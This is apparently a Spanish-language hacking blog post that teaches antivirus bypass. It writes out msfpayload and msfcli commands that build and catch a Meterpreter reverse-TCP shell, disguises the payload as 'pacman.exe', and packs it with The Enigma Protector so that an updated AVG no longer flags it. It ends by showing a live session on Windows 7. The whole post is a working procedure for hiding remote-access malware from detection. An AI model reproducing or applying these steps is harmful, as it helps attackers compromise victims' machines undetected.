Comunmente encontraras este tema como bypass antivurs, si buscas la definición por la web acerca de bypass antivirus te daras cuenta que no hay algo concreto, hacer un bypass simplemente es hacer que los antivirus no detecten nuestros programas maliciosos :D
Hay muchisimas técnicas para hacer este tipo de trabajos y se debe tomar en cuenta 2 puntos muy importantes:
El primer punto:
Si tenemos un antivirus como Avg, avast, avira, etc etc y hacemos una técnica de bypass y el antivirus que tengamos no detecta nuestro programa malicioso, eso no quiere decir que ningun antivirus vaya a detectar nuestro programa o que el bypass sea efectivo en todos los antivirus
probablemente nuestro bypass funcione por un tiempo pero como los antivirus se actualizan, pues es posible que con el tiempo nuestro bypass no funcione y cualquier antivirus nos detecte
Para este ejercicio el antivirus que usaremos será el AVG 2014, aqui pongo la prueba que esta actualizado al fia de hoy (miercoles 4 de diciembre del 2013)
El programa que usaremos se llama The Enigma Protector, este es un sistema profesional para licencias y protección de archivos ejecutables en windows, The Enigma Protector es una herramienta escensial para cada desarrollador de software comercial.
¿Alguna vez tuvieron algun programa y aunque no era un virus o un programa malicioso su antivirus lo detectaba como si fuera un virus? si alguna vez les ha pasado tal vez con The Enigma protector puedan solucionar ese problema.
Bueno vamos sobre la practica, lo primero que debemos de hacer es nuestro payload
ponemos el comando:
msfpayload windows/meterpreter/reverse_tcp lhost="mi ip local" lport=1234 X > /root/Desktop/virus.exe
msfpayload windows/meterpreter/reverse_tcp lhost="mi ip local" lport=1234 X > /root/Desktop/virus.exe
supongo que no es necesario explicar ese comando, si has dado con este blog y no sabes que es cada cosa que escribí en ese comando te sugiero buscar en google el curso que se llama
metasploit unleashed <-- es gratuito y esta muy bien explicado.
metasploit unleashed <-- es gratuito y esta muy bien explicado.
Pero!!!! antes de pasar el archivo supongo que sería buena idea tener listo nuestro metasploit
ponemos el comando msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.71 lport=1234 E
Listo ya tenemos nuestro metasploit listo para tener una sesion de meterpreter cuando ejecuten nuestro pacman.exe, ahora antes de pasar nuestro pacman.exe hay que desactivar el antivirus, claro no para ejecutarlo sino para que el antivirus no vaya a borrar el archivo, recuerden que tenemos que modificarlo entonces desactivamos el antivirus para poder trabajar sobre el archivo pacman.exe
Una vez que hayamos desactivado el antivirus y hayamos copiado nuestro archivo pacman.exe a nuestro windows abrimos el programa The Enigma Protecto y damos click en Directorio
Una vez que hayamos dado click en Directorio buscamos nuestro archivo pacman.exe y damos click en el boton abrir, entonces ahora se nos mostrara que se va a crear un archivo llamado pacman_protected.exe solo tenemos que dar click en el boton proteger
Una vez que The Enigma Protector haya terminado el trabajo nos aparecerá de la siguiente manera y simplemente debemos dar click en el boton cerrar
Por ultimo cuando cerramos The Enigma protector nos pregunta si queremos salvar el proyecto, ahi simplemente le damos click en no
Aqui vemos como tenemos el archivo original pacman.exe y el archivo modificado pacman_protected.exe
Escaneemos el archivo pacman
Aqui podemos ver como AVG lo detecta rápidamente
Ahora hagamos el escaneo sobre el archivo pacman_protected
Vemos que el antivirus ahora no lo ha detectado, pero ahora debemos comprobar que nuestro archivo .exe sigue funcionando es decir nuestro payload no haya quedado "corrupto" por la modificacion que hicimos, entonces procedemos a ejecutarlo
Ahora veamos en nuestro kali que ha pasado
Como vemos tenemos meterpreter dentro del sistema veamos sobre que sistema operativo fue ejecutado nuestro payload
Bueno aqui podemos ver que esto funciona perfectamente con un antivirus actualizado y sobre un windows 7 actualizado y de 64 bits.
Es todo por el momento espero hayan disfrutado de este post :)